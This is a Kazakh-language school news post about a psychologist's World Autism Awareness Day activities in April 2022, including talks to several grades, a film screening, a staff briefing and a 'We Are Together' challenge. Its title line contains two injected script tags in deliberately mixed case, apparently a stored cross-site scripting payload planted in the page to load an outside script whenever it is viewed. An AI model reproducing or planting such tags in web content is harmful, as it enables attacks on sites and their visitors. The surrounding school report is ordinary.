Бүкіләлемдік аутизм мәселесі туралы ақпарат тарату күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
27.04.2022
Мектебіміздің педагог- психологы Хамитова А.А. 1-сәуір күні "Бүкіләлемдік аутизм мәселесі туралы ақпарат тарату күніне" орай 7 сынып оқушыларына аутизм белгілері туралы ақпарат берді.
Сәуірдің 6-күні мектеп педагог-психологы Хамитова А.А. "Бүкіләлемдік аутизм мәселесі туралы ақпарат тарату күніне" орай 9-10 сыныптар арасында аутизм мәселесі бойынша ақпарат берді.
Мақсаты - аутизм туралы ақпарат беру, ерекше балаларды қолдау, қарым-қатынасқа қалай түсу керектігін түсіндіру.
Сәуірдің 19 күні мектеп педагог-психологы Хамитова А.А. "Бүкіләлемдік аутизм мәселесі туралы ақпарат тарату күніне" орай 9-шы сынып оқушыларымен бірге "Жаңбыр адамы" атты бейнефильмді ұсынды.
Мақсаты - оқушыларды бойына бейнефильмдегі бас кейіпкердің жағдайы, және де бас кейіпкер ерекшелігін көрсете білу.
Сәуірдің 22 күні мектеп педагог-психологы Хамитова А.А. "Бүкіләлемдік аутизм мәселесі туралы ақпарат тарату күніне" орай мектеп педагогтарын ақпараттандырды.
Мақсаты - аутизм белгілерін баланың бойынан ерте анықтауға, ерекше балалармен қалай қарым-қатынасқа түсуге, ерекше балалардың ата-аналарымен тығыз байланыста болу.
Сәуірдің 25 күні мектеп педагог-психологы Хамитова А.А. "Бүкіләлемдік аутизм мәселесі туралы ақпарат тарату күніне" орай 9-11 сынып оқушыларымен біріге "Біз біргеміз" атты челлендж өткізілді, оқушыларымыз көк түстес киімдерін киіп, көгілдір шарларды қолдан ұшырды.
Мақсаты - оқушылардың ерекше балаларға қамқор, төзімді болуға дәріптеу.